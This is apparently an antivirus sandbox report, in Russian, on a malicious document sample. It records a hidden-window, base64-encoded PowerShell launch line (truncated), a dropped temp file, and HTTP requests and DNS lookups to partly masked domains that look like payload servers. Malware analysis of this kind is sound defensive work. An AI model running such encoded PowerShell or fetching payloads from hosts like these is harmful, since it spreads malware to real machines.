Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHoAdQBwAHIAcABmAD0AKAAnAE4AYwAnACsAJwA0ADUAeAB5ACcAKwAnADgAJwApADsAJgAoACcAbgBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAHYAOgB0AGUAbQBwAFwAbwBGAEYASQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1428
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1232127.cvr
Сетевая активность
Подключается к
- 'cr###okuota.com':80
- 'cr###okuota.com':443
- 'fg###rdo.com':80
- 'fg###rdo.com':443
- 'ph#####israel.org.il':443
- 'po###b.com.br':80
- 'po###b.com.br':443
- 'pk#.goog':80
- 'me####lucoesti.com':80
- 'id###li.com.br':80
- 'ai##axx.rs':80
TCP
Запросы HTTP GET
- http://cr###okuota.com/assets/ayQUtnd403/
- http://fg###rdo.com/pruebas/iTfVzJiNG/
- http://po###b.com.br/remedios/QUSArASDIIdPz/
- http://pk#.goog/gsr1/gsr1.crt
- http://me####lucoesti.com/R9KDq0O8w/mg7e129370/
- http://id###li.com.br/journal/lhaci5i5315/
- http://ai##axx.rs/MbKoqsSL/
Другие
- 'cr###okuota.com':443
- 'fg###rdo.com':443
- 'ph#####israel.org.il':443
- 'po###b.com.br':443
UDP
- DNS ASK cr###okuota.com
- DNS ASK fg###rdo.com
- DNS ASK ph#####israel.org.il
- DNS ASK po###b.com.br
- DNS ASK pk#.goog
- DNS ASK me####lucoesti.com
- DNS ASK id###li.com.br
- DNS ASK ai##axx.rs
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHoAdQBwAHIAcABmAD0AKAAnAE4AYwAnACsAJwA0ADUAeAB5ACcAKwAnADgAJwApADsAJgAoACcAbgBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAHYAOgB0AGUAbQBwAFwAbwBGAEYASQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)
